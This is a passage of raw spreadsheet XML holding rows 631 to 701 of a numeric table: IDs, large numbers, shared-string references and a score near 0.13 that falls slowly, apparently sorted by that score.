        <v>1.0</v>
      </c>
      <c r="E631" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F631" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="632" ht="15.75" customHeight="1">
      <c r="A632" s="1">
        <v>22244.0</v>
      </c>
      <c r="B632" s="2">
        <v>3.2755052E7</v>
      </c>
      <c r="C632" s="2" t="s">
        <v>555</v>
      </c>
      <c r="D632" s="2">
        <v>1.0</v>
      </c>
      <c r="E632" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F632" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="633" ht="15.75" customHeight="1">
      <c r="A633" s="1">
        <v>29508.0</v>
      </c>
      <c r="B633" s="2">
        <v>3.2755051E7</v>
      </c>
      <c r="C633" s="2" t="s">
        <v>556</v>
      </c>
      <c r="D633" s="2">
        <v>1.0</v>
      </c>
      <c r="E633" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F633" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="634" ht="15.75" customHeight="1">
      <c r="A634" s="1">
        <v>32311.0</v>
      </c>
      <c r="B634" s="2">
        <v>5.5660889E7</v>
      </c>
      <c r="C634" s="2" t="s">
        <v>557</v>
      </c>
      <c r="D634" s="2">
        <v>1.0</v>
      </c>
      <c r="E634" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F634" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="635" ht="15.75" customHeight="1">
      <c r="A635" s="1">
        <v>6620.0</v>
      </c>
      <c r="B635" s="2">
        <v>4.9045226E7</v>
      </c>
      <c r="C635" s="2" t="s">
        <v>558</v>
      </c>
      <c r="D635" s="2">
        <v>1.0</v>
      </c>
      <c r="E635" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F635" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="636" ht="15.75" customHeight="1">
      <c r="A636" s="1">
        <v>22604.0</v>
      </c>
      <c r="B636" s="2">
        <v>3.9543385E7</v>
      </c>
      <c r="C636" s="2" t="s">
        <v>559</v>
      </c>
      <c r="D636" s="2">
        <v>1.0</v>
      </c>
      <c r="E636" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F636" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="637" ht="15.75" customHeight="1">
      <c r="A637" s="1">
        <v>22711.0</v>
      </c>
      <c r="B637" s="2">
        <v>4.3144063E7</v>
      </c>
      <c r="C637" s="2" t="s">
        <v>496</v>
      </c>
      <c r="D637" s="2">
        <v>1.0</v>
      </c>
      <c r="E637" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F637" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="638" ht="15.75" customHeight="1">
      <c r="A638" s="1">
        <v>26034.0</v>
      </c>
      <c r="B638" s="2">
        <v>1.544111E7</v>
      </c>
      <c r="C638" s="2" t="s">
        <v>560</v>
      </c>
      <c r="D638" s="2">
        <v>1.0</v>
      </c>
      <c r="E638" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F638" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="639" ht="15.75" customHeight="1">
      <c r="A639" s="1">
        <v>27909.0</v>
      </c>
      <c r="B639" s="2">
        <v>2.3728896E7</v>
      </c>
      <c r="C639" s="2" t="s">
        <v>486</v>
      </c>
      <c r="D639" s="2">
        <v>1.0</v>
      </c>
      <c r="E639" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F639" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="640" ht="15.75" customHeight="1">
      <c r="A640" s="1">
        <v>28364.0</v>
      </c>
      <c r="B640" s="2">
        <v>2.6025826E7</v>
      </c>
      <c r="C640" s="2" t="s">
        <v>561</v>
      </c>
      <c r="D640" s="2">
        <v>1.0</v>
      </c>
      <c r="E640" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F640" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="641" ht="15.75" customHeight="1">
      <c r="A641" s="1">
        <v>23345.0</v>
      </c>
      <c r="B641" s="2">
        <v>5476965.0</v>
      </c>
      <c r="C641" s="2" t="s">
        <v>532</v>
      </c>
      <c r="D641" s="2">
        <v>1.0</v>
      </c>
      <c r="E641" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F641" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="642" ht="15.75" customHeight="1">
      <c r="A642" s="1">
        <v>20312.0</v>
      </c>
      <c r="B642" s="2">
        <v>1.139567E7</v>
      </c>
      <c r="C642" s="2" t="s">
        <v>562</v>
      </c>
      <c r="D642" s="2">
        <v>1.0</v>
      </c>
      <c r="E642" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F642" s="2">
        <v>0.1342592592592592</v>
      </c>
    </row>
    <row r="643" ht="15.75" customHeight="1">
      <c r="A643" s="1">
        <v>22731.0</v>
      </c>
      <c r="B643" s="2">
        <v>4.3968941E7</v>
      </c>
      <c r="C643" s="2" t="s">
        <v>563</v>
      </c>
      <c r="D643" s="2">
        <v>1.0</v>
      </c>
      <c r="E643" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F643" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="644" ht="15.75" customHeight="1">
      <c r="A644" s="1">
        <v>15245.0</v>
      </c>
      <c r="B644" s="2">
        <v>4.227146E7</v>
      </c>
      <c r="C644" s="2" t="s">
        <v>564</v>
      </c>
      <c r="D644" s="2">
        <v>1.0</v>
      </c>
      <c r="E644" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F644" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="645" ht="15.75" customHeight="1">
      <c r="A645" s="1">
        <v>19810.0</v>
      </c>
      <c r="B645" s="2">
        <v>5.6918694E7</v>
      </c>
      <c r="C645" s="2" t="s">
        <v>565</v>
      </c>
      <c r="D645" s="2">
        <v>1.0</v>
      </c>
      <c r="E645" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F645" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="646" ht="15.75" customHeight="1">
      <c r="A646" s="1">
        <v>20196.0</v>
      </c>
      <c r="B646" s="2">
        <v>1.055081E7</v>
      </c>
      <c r="C646" s="2" t="s">
        <v>566</v>
      </c>
      <c r="D646" s="2">
        <v>1.0</v>
      </c>
      <c r="E646" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F646" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="647" ht="15.75" customHeight="1">
      <c r="A647" s="1">
        <v>20435.0</v>
      </c>
      <c r="B647" s="2">
        <v>1.2382588E7</v>
      </c>
      <c r="C647" s="2" t="s">
        <v>567</v>
      </c>
      <c r="D647" s="2">
        <v>1.0</v>
      </c>
      <c r="E647" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F647" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="648" ht="15.75" customHeight="1">
      <c r="A648" s="1">
        <v>21202.0</v>
      </c>
      <c r="B648" s="2">
        <v>1.9503298E7</v>
      </c>
      <c r="C648" s="2" t="s">
        <v>568</v>
      </c>
      <c r="D648" s="2">
        <v>1.0</v>
      </c>
      <c r="E648" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F648" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="649" ht="15.75" customHeight="1">
      <c r="A649" s="1">
        <v>22248.0</v>
      </c>
      <c r="B649" s="2">
        <v>3.2761968E7</v>
      </c>
      <c r="C649" s="2" t="s">
        <v>569</v>
      </c>
      <c r="D649" s="2">
        <v>1.0</v>
      </c>
      <c r="E649" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F649" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="650" ht="15.75" customHeight="1">
      <c r="A650" s="1">
        <v>22344.0</v>
      </c>
      <c r="B650" s="2">
        <v>3.4549711E7</v>
      </c>
      <c r="C650" s="2" t="s">
        <v>570</v>
      </c>
      <c r="D650" s="2">
        <v>1.0</v>
      </c>
      <c r="E650" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F650" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="651" ht="15.75" customHeight="1">
      <c r="A651" s="1">
        <v>23022.0</v>
      </c>
      <c r="B651" s="2">
        <v>4996591.0</v>
      </c>
      <c r="C651" s="2" t="s">
        <v>571</v>
      </c>
      <c r="D651" s="2">
        <v>1.0</v>
      </c>
      <c r="E651" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F651" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="652" ht="15.75" customHeight="1">
      <c r="A652" s="1">
        <v>23617.0</v>
      </c>
      <c r="B652" s="2">
        <v>6483785.0</v>
      </c>
      <c r="C652" s="2" t="s">
        <v>572</v>
      </c>
      <c r="D652" s="2">
        <v>1.0</v>
      </c>
      <c r="E652" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F652" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="653" ht="15.75" customHeight="1">
      <c r="A653" s="1">
        <v>24500.0</v>
      </c>
      <c r="B653" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C653" s="2" t="s">
        <v>573</v>
      </c>
      <c r="D653" s="2">
        <v>1.0</v>
      </c>
      <c r="E653" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F653" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="654" ht="15.75" customHeight="1">
      <c r="A654" s="1">
        <v>25418.0</v>
      </c>
      <c r="B654" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C654" s="2" t="s">
        <v>574</v>
      </c>
      <c r="D654" s="2">
        <v>1.0</v>
      </c>
      <c r="E654" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F654" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="655" ht="15.75" customHeight="1">
      <c r="A655" s="1">
        <v>25425.0</v>
      </c>
      <c r="B655" s="2">
        <v>1.3821075E7</v>
      </c>
      <c r="C655" s="2" t="s">
        <v>575</v>
      </c>
      <c r="D655" s="2">
        <v>1.0</v>
      </c>
      <c r="E655" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F655" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="656" ht="15.75" customHeight="1">
      <c r="A656" s="1">
        <v>25464.0</v>
      </c>
      <c r="B656" s="2">
        <v>1.3986107E7</v>
      </c>
      <c r="C656" s="2" t="s">
        <v>576</v>
      </c>
      <c r="D656" s="2">
        <v>1.0</v>
      </c>
      <c r="E656" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F656" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="657" ht="15.75" customHeight="1">
      <c r="A657" s="1">
        <v>25476.0</v>
      </c>
      <c r="B657" s="2">
        <v>1.4015943E7</v>
      </c>
      <c r="C657" s="2" t="s">
        <v>577</v>
      </c>
      <c r="D657" s="2">
        <v>1.0</v>
      </c>
      <c r="E657" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F657" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="658" ht="15.75" customHeight="1">
      <c r="A658" s="1">
        <v>27125.0</v>
      </c>
      <c r="B658" s="2">
        <v>2.0721709E7</v>
      </c>
      <c r="C658" s="2" t="s">
        <v>578</v>
      </c>
      <c r="D658" s="2">
        <v>1.0</v>
      </c>
      <c r="E658" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F658" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="659" ht="15.75" customHeight="1">
      <c r="A659" s="1">
        <v>27301.0</v>
      </c>
      <c r="B659" s="2">
        <v>2.1337498E7</v>
      </c>
      <c r="C659" s="2" t="s">
        <v>579</v>
      </c>
      <c r="D659" s="2">
        <v>1.0</v>
      </c>
      <c r="E659" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F659" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="660" ht="15.75" customHeight="1">
      <c r="A660" s="1">
        <v>27493.0</v>
      </c>
      <c r="B660" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C660" s="2" t="s">
        <v>580</v>
      </c>
      <c r="D660" s="2">
        <v>1.0</v>
      </c>
      <c r="E660" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F660" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="661" ht="15.75" customHeight="1">
      <c r="A661" s="1">
        <v>28592.0</v>
      </c>
      <c r="B661" s="2">
        <v>2.6983486E7</v>
      </c>
      <c r="C661" s="2" t="s">
        <v>581</v>
      </c>
      <c r="D661" s="2">
        <v>1.0</v>
      </c>
      <c r="E661" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F661" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="662" ht="15.75" customHeight="1">
      <c r="A662" s="1">
        <v>28610.0</v>
      </c>
      <c r="B662" s="2">
        <v>2.7122363E7</v>
      </c>
      <c r="C662" s="2" t="s">
        <v>579</v>
      </c>
      <c r="D662" s="2">
        <v>1.0</v>
      </c>
      <c r="E662" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F662" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="663" ht="15.75" customHeight="1">
      <c r="A663" s="1">
        <v>29516.0</v>
      </c>
      <c r="B663" s="2">
        <v>3.2761967E7</v>
      </c>
      <c r="C663" s="2" t="s">
        <v>569</v>
      </c>
      <c r="D663" s="2">
        <v>1.0</v>
      </c>
      <c r="E663" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F663" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="664" ht="15.75" customHeight="1">
      <c r="A664" s="1">
        <v>30160.0</v>
      </c>
      <c r="B664" s="2">
        <v>3.704579E7</v>
      </c>
      <c r="C664" s="2" t="s">
        <v>582</v>
      </c>
      <c r="D664" s="2">
        <v>1.0</v>
      </c>
      <c r="E664" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F664" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="665" ht="15.75" customHeight="1">
      <c r="A665" s="1">
        <v>30810.0</v>
      </c>
      <c r="B665" s="2">
        <v>4.5288882E7</v>
      </c>
      <c r="C665" s="2" t="s">
        <v>583</v>
      </c>
      <c r="D665" s="2">
        <v>1.0</v>
      </c>
      <c r="E665" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F665" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="666" ht="15.75" customHeight="1">
      <c r="A666" s="1">
        <v>32779.0</v>
      </c>
      <c r="B666" s="2">
        <v>6119883.0</v>
      </c>
      <c r="C666" s="2" t="s">
        <v>584</v>
      </c>
      <c r="D666" s="2">
        <v>1.0</v>
      </c>
      <c r="E666" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F666" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="667" ht="15.75" customHeight="1">
      <c r="A667" s="1">
        <v>33567.0</v>
      </c>
      <c r="B667" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C667" s="2" t="s">
        <v>585</v>
      </c>
      <c r="D667" s="2">
        <v>1.0</v>
      </c>
      <c r="E667" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F667" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="668" ht="15.75" customHeight="1">
      <c r="A668" s="1">
        <v>18985.0</v>
      </c>
      <c r="B668" s="2">
        <v>5.441386E7</v>
      </c>
      <c r="C668" s="2" t="s">
        <v>586</v>
      </c>
      <c r="D668" s="2">
        <v>1.0</v>
      </c>
      <c r="E668" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F668" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="669" ht="15.75" customHeight="1">
      <c r="A669" s="1">
        <v>20633.0</v>
      </c>
      <c r="B669" s="2">
        <v>1.4153761E7</v>
      </c>
      <c r="C669" s="2" t="s">
        <v>587</v>
      </c>
      <c r="D669" s="2">
        <v>1.0</v>
      </c>
      <c r="E669" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F669" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="670" ht="15.75" customHeight="1">
      <c r="A670" s="1">
        <v>23557.0</v>
      </c>
      <c r="B670" s="2">
        <v>6138399.0</v>
      </c>
      <c r="C670" s="2" t="s">
        <v>588</v>
      </c>
      <c r="D670" s="2">
        <v>1.0</v>
      </c>
      <c r="E670" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F670" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="671" ht="15.75" customHeight="1">
      <c r="A671" s="1">
        <v>22713.0</v>
      </c>
      <c r="B671" s="2">
        <v>4.3325653E7</v>
      </c>
      <c r="C671" s="2" t="s">
        <v>589</v>
      </c>
      <c r="D671" s="2">
        <v>1.0</v>
      </c>
      <c r="E671" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F671" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="672" ht="15.75" customHeight="1">
      <c r="A672" s="1">
        <v>26577.0</v>
      </c>
      <c r="B672" s="2">
        <v>1.7890347E7</v>
      </c>
      <c r="C672" s="2" t="s">
        <v>545</v>
      </c>
      <c r="D672" s="2">
        <v>1.0</v>
      </c>
      <c r="E672" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F672" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="673" ht="15.75" customHeight="1">
      <c r="A673" s="1">
        <v>28777.0</v>
      </c>
      <c r="B673" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C673" s="2" t="s">
        <v>590</v>
      </c>
      <c r="D673" s="2">
        <v>1.0</v>
      </c>
      <c r="E673" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F673" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="674" ht="15.75" customHeight="1">
      <c r="A674" s="1">
        <v>29809.0</v>
      </c>
      <c r="B674" s="2">
        <v>3.5174229E7</v>
      </c>
      <c r="C674" s="2" t="s">
        <v>591</v>
      </c>
      <c r="D674" s="2">
        <v>1.0</v>
      </c>
      <c r="E674" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F674" s="2">
        <v>0.132768361581921</v>
      </c>
    </row>
    <row r="675" ht="15.75" customHeight="1">
      <c r="A675" s="1">
        <v>30401.0</v>
      </c>
      <c r="B675" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C675" s="2" t="s">
        <v>592</v>
      </c>
      <c r="D675" s="2">
        <v>1.0</v>
      </c>
      <c r="E675" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F675" s="2">
        <v>0.132768361581921</v>
      </c>
    </row>
    <row r="676" ht="15.75" customHeight="1">
      <c r="A676" s="1">
        <v>31338.0</v>
      </c>
      <c r="B676" s="2">
        <v>4.9781659E7</v>
      </c>
      <c r="C676" s="2" t="s">
        <v>514</v>
      </c>
      <c r="D676" s="2">
        <v>1.0</v>
      </c>
      <c r="E676" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F676" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="677" ht="15.75" customHeight="1">
      <c r="A677" s="1">
        <v>5014.0</v>
      </c>
      <c r="B677" s="2">
        <v>4.4199713E7</v>
      </c>
      <c r="C677" s="2" t="s">
        <v>593</v>
      </c>
      <c r="D677" s="2">
        <v>1.0</v>
      </c>
      <c r="E677" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F677" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="678" ht="15.75" customHeight="1">
      <c r="A678" s="1">
        <v>6568.0</v>
      </c>
      <c r="B678" s="2">
        <v>4.8903907E7</v>
      </c>
      <c r="C678" s="2" t="s">
        <v>594</v>
      </c>
      <c r="D678" s="2">
        <v>1.0</v>
      </c>
      <c r="E678" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F678" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="679" ht="15.75" customHeight="1">
      <c r="A679" s="1">
        <v>21030.0</v>
      </c>
      <c r="B679" s="2">
        <v>1.7526962E7</v>
      </c>
      <c r="C679" s="2" t="s">
        <v>595</v>
      </c>
      <c r="D679" s="2">
        <v>1.0</v>
      </c>
      <c r="E679" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F679" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="680" ht="15.75" customHeight="1">
      <c r="A680" s="1">
        <v>21052.0</v>
      </c>
      <c r="B680" s="2">
        <v>1.7744988E7</v>
      </c>
      <c r="C680" s="2" t="s">
        <v>596</v>
      </c>
      <c r="D680" s="2">
        <v>1.0</v>
      </c>
      <c r="E680" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F680" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="681" ht="15.75" customHeight="1">
      <c r="A681" s="1">
        <v>21396.0</v>
      </c>
      <c r="B681" s="2">
        <v>2.1801438E7</v>
      </c>
      <c r="C681" s="2" t="s">
        <v>597</v>
      </c>
      <c r="D681" s="2">
        <v>1.0</v>
      </c>
      <c r="E681" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F681" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="682" ht="15.75" customHeight="1">
      <c r="A682" s="1">
        <v>21472.0</v>
      </c>
      <c r="B682" s="2">
        <v>2.294916E7</v>
      </c>
      <c r="C682" s="2" t="s">
        <v>598</v>
      </c>
      <c r="D682" s="2">
        <v>1.0</v>
      </c>
      <c r="E682" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F682" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="683" ht="15.75" customHeight="1">
      <c r="A683" s="1">
        <v>21890.0</v>
      </c>
      <c r="B683" s="2">
        <v>2.7785664E7</v>
      </c>
      <c r="C683" s="2" t="s">
        <v>599</v>
      </c>
      <c r="D683" s="2">
        <v>1.0</v>
      </c>
      <c r="E683" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F683" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="684" ht="15.75" customHeight="1">
      <c r="A684" s="1">
        <v>22450.0</v>
      </c>
      <c r="B684" s="2">
        <v>3625152.0</v>
      </c>
      <c r="C684" s="2" t="s">
        <v>600</v>
      </c>
      <c r="D684" s="2">
        <v>1.0</v>
      </c>
      <c r="E684" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F684" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="685" ht="15.75" customHeight="1">
      <c r="A685" s="1">
        <v>22581.0</v>
      </c>
      <c r="B685" s="2">
        <v>3.8855982E7</v>
      </c>
      <c r="C685" s="2" t="s">
        <v>601</v>
      </c>
      <c r="D685" s="2">
        <v>1.0</v>
      </c>
      <c r="E685" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F685" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="686" ht="15.75" customHeight="1">
      <c r="A686" s="1">
        <v>23538.0</v>
      </c>
      <c r="B686" s="2">
        <v>5953885.0</v>
      </c>
      <c r="C686" s="2" t="s">
        <v>602</v>
      </c>
      <c r="D686" s="2">
        <v>1.0</v>
      </c>
      <c r="E686" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F686" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="687" ht="15.75" customHeight="1">
      <c r="A687" s="1">
        <v>26925.0</v>
      </c>
      <c r="B687" s="2">
        <v>1.9427156E7</v>
      </c>
      <c r="C687" s="2" t="s">
        <v>600</v>
      </c>
      <c r="D687" s="2">
        <v>1.0</v>
      </c>
      <c r="E687" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F687" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="688" ht="15.75" customHeight="1">
      <c r="A688" s="1">
        <v>27074.0</v>
      </c>
      <c r="B688" s="2">
        <v>2.0446226E7</v>
      </c>
      <c r="C688" s="2" t="s">
        <v>603</v>
      </c>
      <c r="D688" s="2">
        <v>1.0</v>
      </c>
      <c r="E688" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F688" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="689" ht="15.75" customHeight="1">
      <c r="A689" s="1">
        <v>27111.0</v>
      </c>
      <c r="B689" s="2">
        <v>2.0615421E7</v>
      </c>
      <c r="C689" s="2" t="s">
        <v>604</v>
      </c>
      <c r="D689" s="2">
        <v>1.0</v>
      </c>
      <c r="E689" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F689" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="690" ht="15.75" customHeight="1">
      <c r="A690" s="1">
        <v>27789.0</v>
      </c>
      <c r="B690" s="2">
        <v>2.313107E7</v>
      </c>
      <c r="C690" s="2" t="s">
        <v>605</v>
      </c>
      <c r="D690" s="2">
        <v>1.0</v>
      </c>
      <c r="E690" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F690" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1">
      <c r="A691" s="1">
        <v>29772.0</v>
      </c>
      <c r="B691" s="2">
        <v>3.4959118E7</v>
      </c>
      <c r="C691" s="2" t="s">
        <v>606</v>
      </c>
      <c r="D691" s="2">
        <v>1.0</v>
      </c>
      <c r="E691" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F691" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1">
      <c r="A692" s="1">
        <v>30509.0</v>
      </c>
      <c r="B692" s="2">
        <v>4.0072238E7</v>
      </c>
      <c r="C692" s="2" t="s">
        <v>607</v>
      </c>
      <c r="D692" s="2">
        <v>1.0</v>
      </c>
      <c r="E692" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F692" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1">
      <c r="A693" s="1">
        <v>32116.0</v>
      </c>
      <c r="B693" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C693" s="2" t="s">
        <v>608</v>
      </c>
      <c r="D693" s="2">
        <v>1.0</v>
      </c>
      <c r="E693" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F693" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1">
      <c r="A694" s="1">
        <v>33309.0</v>
      </c>
      <c r="B694" s="2">
        <v>7507856.0</v>
      </c>
      <c r="C694" s="2" t="s">
        <v>609</v>
      </c>
      <c r="D694" s="2">
        <v>1.0</v>
      </c>
      <c r="E694" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F694" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1">
      <c r="A695" s="1">
        <v>33744.0</v>
      </c>
      <c r="B695" s="2">
        <v>8556674.0</v>
      </c>
      <c r="C695" s="2" t="s">
        <v>609</v>
      </c>
      <c r="D695" s="2">
        <v>1.0</v>
      </c>
      <c r="E695" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F695" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1">
      <c r="A696" s="1">
        <v>31679.0</v>
      </c>
      <c r="B696" s="2">
        <v>5187554.0</v>
      </c>
      <c r="C696" s="2" t="s">
        <v>610</v>
      </c>
      <c r="D696" s="2">
        <v>1.0</v>
      </c>
      <c r="E696" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F696" s="2">
        <v>0.1324074074074075</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1">
      <c r="A697" s="1">
        <v>20484.0</v>
      </c>
      <c r="B697" s="2">
        <v>1.2845708E7</v>
      </c>
      <c r="C697" s="2" t="s">
        <v>611</v>
      </c>
      <c r="D697" s="2">
        <v>1.0</v>
      </c>
      <c r="E697" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F697" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1">
      <c r="A698" s="1">
        <v>29743.0</v>
      </c>
      <c r="B698" s="2">
        <v>3.4656878E7</v>
      </c>
      <c r="C698" s="2" t="s">
        <v>612</v>
      </c>
      <c r="D698" s="2">
        <v>1.0</v>
      </c>
      <c r="E698" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F698" s="2">
        <v>0.1324074074074074</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1">
      <c r="A699" s="1">
        <v>15363.0</v>
      </c>
      <c r="B699" s="2">
        <v>4.2712467E7</v>
      </c>
      <c r="C699" s="2" t="s">
        <v>613</v>
      </c>
      <c r="D699" s="2">
        <v>1.0</v>
      </c>
      <c r="E699" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F699" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1">
      <c r="A700" s="1">
        <v>21597.0</v>
      </c>
      <c r="B700" s="2">
        <v>2.40424E7</v>
      </c>
      <c r="C700" s="2" t="s">
        <v>614</v>
      </c>
      <c r="D700" s="2">
        <v>1.0</v>
      </c>
      <c r="E700" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F700" s="2">
        <v>0.1320582877959928</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1">
      <c r="A701" s="1">
        <v>17980.0</v>
      </c>
      <c r="B701" s="2">
        <v>5.137653E7</v>
      </c>
      <c r="C701" s="2" t="s">
        <v>615</v>
      </c>
      <c r="D701" s="2">
